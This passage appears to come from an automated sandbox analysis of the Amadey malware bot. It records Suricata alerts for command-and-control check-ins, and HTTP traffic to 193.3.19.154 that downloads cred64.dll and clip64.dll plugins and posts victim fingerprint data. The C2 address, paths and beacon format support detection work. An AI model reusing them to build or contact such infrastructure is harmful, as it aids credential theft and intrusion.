                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49735 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49817 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49751 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49735 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49858 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49858 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49806 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49848 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49766 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49766 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49839 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49878 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49878 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49839 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49909 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49909 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49920 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49931 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49931 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49920 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49848 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49964 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49964 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50013 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50013 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49981 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49981 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50035 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50035 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50047 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50051 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50044 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50051 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50044 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50055 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50048 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50048 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50055 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50058 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50056 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50047 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49973 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49953 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50050 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49973 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49953 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50056 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50050 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50052 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50052 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50058 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50060 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50057 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50057 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50060 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50024 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50024 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50049 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50049 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49867 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50062 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49867 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50062 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49992 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50003 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49992 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50054 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50053 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50054 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50003 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49942 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49942 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50061 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50061 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50059 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50059 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50053 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:50063 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:50063 -> 193.3.19.154:80
                  Source: Malware configuration extractorIPs: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
